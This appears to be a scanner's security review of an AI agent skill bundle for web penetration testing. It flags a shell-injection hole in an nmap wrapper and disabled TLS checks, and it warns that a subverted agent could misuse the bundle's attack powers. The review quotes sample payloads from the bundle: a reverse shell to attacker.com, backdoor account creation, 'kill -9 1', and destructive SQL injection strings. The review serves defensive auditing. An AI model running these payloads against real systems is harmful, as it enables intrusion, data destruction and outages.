Web Security Penetration Test
MaliciousAudited by VirusTotal on May 10, 2026.
Overview
Type: OpenClaw Skill Name: web-security-pentest-skill-complete Version: 1.0.0 The skill bundle provides a comprehensive suite for web penetration testing but contains critical vulnerabilities and high-risk capabilities. Specifically, 'scripts/utils/nmap_wrapper.py' is vulnerable to shell injection because it constructs nmap commands using unsanitized input and executes them via 'subprocess.Popen' with 'shell=True'. While the bundle's intent appears to be legitimate security auditing, it grants the AI agent broad power to execute system commands and perform network attacks, which could be exploited if the agent is subverted.
Findings (0)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
Running this skill against the wrong target could cause unauthorized compromise, outages, or data exposure.
The payload catalog includes reverse shells, account creation, and destructive process commands. These are real exploit payloads that can compromise or disrupt a target if automatically tested against a vulnerable system.
bash -i >& /dev/tcp/attacker.com/4444 0>&1 ... ; useradd attacker ... | kill -9 1
Use only in an authorized test environment; disable reverse-shell, destructive, and exfiltration payloads unless explicitly approved for a controlled engagement.
If these payloads are sent to a vulnerable production application, they could alter or destroy data.
The SQL injection payloads include destructive database mutations, credential changes, and backdoor-writing examples, not only non-destructive detection probes.
'; DROP TABLE users; -- ... '; UPDATE users SET password='hacked' WHERE username='admin'; -- ... ' INTO OUTFILE '/tmp/backdoor.php' --
Prefer non-destructive proof-of-concept payloads by default and require explicit human approval before any mutation or backdoor-style test.
Authenticated scans may send sensitive cookies, tokens, or test credentials over connections that are not properly verified.
The static scan evidence shows HTTPS certificate verification is disabled. That can expose scan traffic or authenticated test credentials to interception and can reduce confidence in scan results.
response = requests.get(url, headers=self.headers, timeout=10, verify=False)
Enable TLS verification by default and provide an explicit, documented opt-out for testing hosts with self-signed or broken certificates.
Supplying real production credentials could give the skill broad access to protected application areas.
The configuration supports authenticated scans using passwords, bearer tokens, OAuth, or cookies. It is disabled and blank by default, but users may supply sensitive credentials.
authentication:
enabled: false
method: "basic" # basic, bearer, cookie, oauth2
username: ""
password: ""
token: ""
cookie_name: "session"
cookie_value: ""Use least-privilege test accounts and avoid production secrets unless the engagement explicitly requires them.
Users may need to install powerful third-party security tools that were not captured in the registry requirements.
The skill documentation instructs installation of multiple external tools and packages, while the registry metadata declares no required binaries and there is no install spec.
sudo apt install -y nmap nikto sqlmap gobuster subfinder whatweb curl wget ... pip install requests beautifulsoup4 scapy colorama
Install dependencies only from trusted package sources and review the exact tools required before use.
A wrong target or overly broad scope could trigger scanning traffic across systems the user did not intend to test.
The configuration enables broad reconnaissance across subdomains and many ports. This is expected for penetration testing, but mistakes in target scope can affect many systems.
subdomain_enumeration:
enabled: true ... port_scanning:
enabled: true ... ports: "1-1000,3000-4000,8000-9000"Set tight target scopes, exclusions, rate limits, and written authorization before running scans.